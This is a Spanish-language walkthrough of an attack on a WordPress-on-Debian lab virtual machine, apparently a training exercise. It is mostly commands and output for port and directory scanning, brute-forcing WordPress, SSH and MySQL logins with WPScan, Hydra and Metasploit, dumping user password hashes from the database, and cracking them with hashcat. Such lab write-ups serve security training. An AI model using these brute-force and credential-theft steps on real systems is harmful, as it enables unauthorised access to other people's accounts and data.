Maquina debian con wordpress
Empezamos con un escaneo de la red para encontrar equipos:
sudo nmap -sn 192.168.0.0/24
sudo arp-scan --interface eth0 --localnet
Y encontramos equipos, los apuntamos, en este caso vamos a ir a por la 192.168.0.108:
sudo nmap -sCV -sS -PN -p- -n --min-rate 5000 192.168.0.108
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-19 17:25 CEST
Nmap scan report for 192.168.0.108
Host is up (0.00028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:1a:e9:21:1b:21:c0:c7:b4:55:54:58:45:7a:29:af (RSA)
| 256 bf:ff:d4:d5:92:58:3e:dd:45:38:fc:3f:12:f1:44:42 (ECDSA)
|_ 256 a0:f0:d7:82:ef:dc:ef:1a:14:88:2e:31:82:b5:61:fc (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.39-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.39-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, ODBCClient, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: Fmqrj:";@p5U/&q+}Wz!
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:64:68:6A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds
Nos toca hacer un escaneo
Podemos ver varios vectores de ataque, vamos uno por uno
Empezamos por el puerto 80
Encontramos una ruta por defecto la cual no tendría que estar habilitada
Y nos puede dar información muy importante como usuarios, contraseñas, directorios, etc.
Hagamos un escaneo de directorios
dirb http://192.168.0.108
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Aug 19 17:30:43 2023
URL_BASE: http://192.168.0.108/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.108/ ----
==> DIRECTORY: http://192.168.0.108/admin/
==> DIRECTORY: http://192.168.0.108/Downloads/
+ http://192.168.0.108/index.html (CODE:200|SIZE:10701)
+ http://192.168.0.108/phpinfo.php (CODE:200|SIZE:86447)
+ http://192.168.0.108/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.0.108/wordpress/
---- Entering directory: http://192.168.0.108/admin/ ----
+ http://192.168.0.108/admin/ChangeLog (CODE:200|SIZE:71006)
==> DIRECTORY: http://192.168.0.108/admin/doc/
==> DIRECTORY: http://192.168.0.108/admin/examples/
+ http://192.168.0.108/admin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.0.108/admin/index.php (CODE:200|SIZE:18391)
==> DIRECTORY: http://192.168.0.108/admin/js/
==> DIRECTORY: http://192.168.0.108/admin/libraries/
+ http://192.168.0.108/admin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://192.168.0.108/admin/locale/
+ http://192.168.0.108/admin/README (CODE:200|SIZE:1520)
+ http://192.168.0.108/admin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.0.108/admin/setup/
==> DIRECTORY: http://192.168.0.108/admin/sql/
==> DIRECTORY: http://192.168.0.108/admin/templates/
==> DIRECTORY: http://192.168.0.108/admin/themes/
==> DIRECTORY: http://192.168.0.108/admin/tmp/
==> DIRECTORY: http://192.168.0.108/admin/vendor/
---- Entering directory: http://192.168.0.108/Downloads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/ ----
+ http://192.168.0.108/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-includes/
+ http://192.168.0.108/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.0.108/admin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/setup/ ----
+ http://192.168.0.108/admin/setup/index.php (CODE:200|SIZE:1002)
==> DIRECTORY: http://192.168.0.108/admin/setup/lib/
==> DIRECTORY: http://192.168.0.108/admin/setup/themes/
---- Entering directory: http://192.168.0.108/admin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/tmp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/ ----
+ http://192.168.0.108/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/includes/
+ http://192.168.0.108/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/user/
---- Entering directory: http://192.168.0.108/wordpress/wp-content/ ----
+ http://192.168.0.108/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.0.108/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/setup/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/network/ ----
+ http://192.168.0.108/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.108/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/user/ ----
+ http://192.168.0.108/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.108/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/plugins/ ----
+ http://192.168.0.108/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/themes/ ----
+ http://192.168.0.108/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Aug 19 17:31:23 2023
DOWNLOADED: 46120 - FOUND: 21
Hemos encontrado un wordpress, wp-admin, phpmyadmin, etc.
Y encontramos un panel de autenticación de WordPress.
Hagamos un escaneo rápido de WordPress con WPScan de forma automática pero muy ruidosa:
wpscan --url http://192.168.0.108/wordpress/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:45:34 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] vagrant
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Aug 19 17:46:05 2023
[+] Requests Done: 62
[+] Cached Requests: 4
[+] Data Sent: 15.437 KB
[+] Data Received: 12.844 MB
[+] Memory used: 153.324 MB
[+] Elapsed time: 00:00:31
Y vemos que nos ha enumerado varios usuarios.
Intentemos hacer enumeración y fuerza bruta con WPScan:
wpscan --url http://192.168.0.108/wordpress/ --passwords /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:54:47 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] vagrant
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 4 user/s
[SUCCESS] - philip / password
[SUCCESS] - admin / password
[SUCCESS] - hugo / 987654321
^Cying vagrant / misty123 Time: 00:04:13 < > (11455 / 57377660) 0.01% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: philip, Password: password
| Username: admin, Password: password
| Username: hugo, Password: 987654321
[!] No WPScan API Token given, as a result vulnerability data has not been output. / 57377660) 0.01% ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Aug 19 17:59:44 2023
[+] Requests Done: 11622
[+] Cached Requests: 40
[+] Data Sent: 6.1 MB
[+] Data Received: 6.798 MB
[+] Memory used: 257.57 MB
[+] Elapsed time: 00:04:57
Scan Aborted: Canceled by User
Hemos encontrado algunos temas, plugins y contraseñas.
Con WhatWeb también encontramos información necesaria:
whatweb http://192.168.0.108/wordpress
http://192.168.0.108/wordpress [301 Moved Permanently] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)],
IP[192.168.0.108], RedirectLocation[http://192.168.0.108/wordpress/], Title[301 Moved Permanently]
http://192.168.0.108/wordpress/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)],
IP[192.168.0.108], MetaGenerator[Elementor 3.13.4; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading,
a11y_improvements, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap,WordPress 6.2.2],
Script, UncommonHeaders[link], WordPress[6.2.2]
Intentemos hacer fuerza bruta con Hydra:
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.0.108 http-post-form '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^S:302'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:06:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking http-post-form://192.168.0.108:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:302
[80][http-post-form] host: 192.168.0.108 login: admin password: password
[80][http-post-form] host: 192.168.0.108 login: admin password: password
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:06:38
En caso de que se muestre un mensaje de «Usuario inválido,» ajusta la URL a:
'/wordpress/wp-login.php:log=^USER^&pwd=^PASS^F:usuario invalido'
Vamos a por el servicio SSH en el puerto 22:
hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://192.168.0.108
ydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:55:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:2/p:3), ~1 try per task
[DATA] attacking ssh://192.168.0.108:22/
[22][ssh] host: 192.168.0.108 login: debian password: debian
[22][ssh] host: 192.168.0.108 login: vagrant password: vagrant
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:56:04
Encontramos una contraseña y conseguimos acceder al sistema SSH.
vagrant@debian10:~$ hostname -I
192.168.0.108
vagrant@debian10:~$
También podemos intentar acceder con Metasploit:
msfconsole
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can use help to view all
available commands
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) >
Luego escalamos privilegios y exploramos más usuarios, tareas cron, contraseñas y otros servicios. Buscamos mas usuarios con `cat /etc/passwd` para enumerar Buscamos tareas contrab con `crotrab -l` con privilegios de sudores
sudo -l
Matching Defaults entries for vagrant on debian10:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vagrant may run the following commands on debian10:
(root) NOPASSWD: /usr/bin/find
Vamos al servicio de MySQL en el puerto 3306:
mysql -u root -p -h 192.168.0.108
Intentamos acceder con contraseñas por defecto:
mysql -u root -p -h 192.168.0.108
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.109' (using password: NO)
Abrimos Metasploit y vemos que no podemos acceder:
msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
msf6 > use 0
msf6 auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted
: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-met
asploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair p
er line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/mysql/mysql_login) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/mysql/mysql_login) > set rhost 192.168.0.108
rhost => 192.168.0.108
msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > run
[*] 192.168.0.108:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Intentamos más exploits o usar Hydra:
hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql://192.168.0.108
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 19:15:31
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169512 login tries (l:168/p:1009), ~42378 tries per task
[DATA] attacking mysql://192.168.0.108:3306/
[ERROR] Child with pid 64180 terminating, can not connect
[ERROR] Child with pid 64182 terminating, can not connect
[ERROR] Child with pid 64181 terminating, can not connect
[ERROR] Child with pid 64183 terminating, can not connect
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 19:15:56
En este caso, la única forma de entrar es con las contraseñas por defecto (root:root).
Investigamos por MySQL:
mysql -u root -p -h 192.168.0.108
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.3.39-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0,063 sec)
MariaDB [(none)]> show tables;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_e_events |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
13 rows in set (0,001 sec)
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
| 1 | admin | $P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L. | admin | [email protected] | http://localhost/wordpress | 2023-06-15 14:30:02 | | 0 | admin |
| 2 | hugo | $P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90 | hugo | [email protected] | | 2023-06-15 14:32:39 | 1686839559:$P$Bp1eBXl/RR6RcMkYSytgzc1sHt6nml1 | 0 | hugo torres |
| 3 | philip | $P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/ | philip | [email protected] | | 2023-06-15 14:33:13 | 1686839593:$P$BYVMku..4QUJUIzoUHMr8tdsv87TNK/ | 0 | philip padilla |
| 4 | vagrant | $P$BkxK5UElDjCJU1dd19x9PExnko8//h/ | vagrant | [email protected] | | 2023-06-15 14:34:18 | 1686839658:$P$B4eTfAbXY8.IA4sRYmBjlf0DKf0ohH/ | 0 | vagrant vagrant |
+----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
4 rows in set (0,001 sec)
MariaDB [wordpress]>
Y vemos contraseñas hasheadas, así que vamos a intentar romperlas con Hashcat:
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L.:password
$P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/:password
$P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90:987654321
